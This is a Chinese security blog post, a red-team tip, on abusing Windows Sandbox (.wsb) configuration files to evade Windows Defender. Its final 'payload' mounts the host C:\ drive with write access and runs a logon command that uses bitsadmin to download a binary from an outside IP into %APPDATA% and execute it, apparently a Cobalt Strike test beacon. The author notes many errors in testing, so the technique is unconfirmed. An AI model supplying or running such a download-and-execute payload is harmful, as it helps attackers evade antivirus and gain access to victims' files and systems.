RedTips 之使用 WSB 绕过 defender

地球胖头鱼 2020-12-24
Web安全 发布于 2020-12-24 15:02:10 阅读 80 评论 0

什么是WSB?

全称Windows Sandbox:一个独立的临时桌面环境,可以在其中运行不受信任的软件,而不必担心会对您的PC产生持久影响。Windows Sandbox中安装的任何软件仅保留在沙箱中,不会影响您的主机。Windows Sandbox关闭后,将永久删除包含其所有文件和状态的所有软件。

启用方法如下:

Enable-WindowsOptionalFeature -FeatureName "Containers-DisposableClientVM" -All -Online

WSB利用

由于其特殊性,WSB不受windows defender的保护。

而根据微软文档所说,我们可以使用.wsb文件来定制我们的沙箱内容。

<Configuration>
    <LogonCommand>
        <Command>
            cmd.exe 
        </Command>
    </LogonCommand>
</Configuration>

这样启动的沙箱,会默认开启cmd窗口。

也可以进行文件夹的映射。

<MappedFolders> 
  <MappedFolder>  
    <HostFolder>C:\</HostFolder>  
    <SandboxFolder>C:\Users\WDAGUtilityAccount\C_Mount</SandboxFolder>  
    <ReadOnly>false</ReadOnly>  
  </MappedFolder>

最终的payload:

<Configuration> 
  <MappedFolders> 
    <MappedFolder> 
      <HostFolder>C:\</HostFolder> 
      <SandboxFolder>C:\Users\WDAGUtilityAccount\UserFiles</SandboxFolder> 
      <ReadOnly>false</ReadOnly> 
    </MappedFolder> 
  </MappedFolders> 
  <LogonCommand> 
    <Command>cmd.exe /c ping 127.0.0.1 -n 3 >null & bitsadmin /transfer myjob /download /priority high http://192.168.2.114/cs_wsb_test.bin "%APPDATA%\cs.exe">nul & start %APPDATA%\cs.exe</Command> 
  </LogonCommand> 
</Configuration>

ps:我在测试过程中出现了很多错误一直在提示,如果有那位大佬能成功希望你能在这篇文章下面留言,我们共同探讨,谢谢。

原文地址:https://blog.syscall.party/post/weaponizin...

本作品采用《CC 协议》,转载必须注明作者和本文链接
讨论数量: 0
(= ̄ω ̄=)··· 暂无内容!
请勿发布不友善或者负能量的内容。与人为善,比聪明更重要!
地球胖头鱼
未填写
  • 作者发布文章177
  • 作者收获粉丝6
  • 作者收到点赞0
  • 所有文章被收藏了1
  • 博客总访问量排行第2
  • 博客总访问量2.8 万(每日更新)
查看所有博文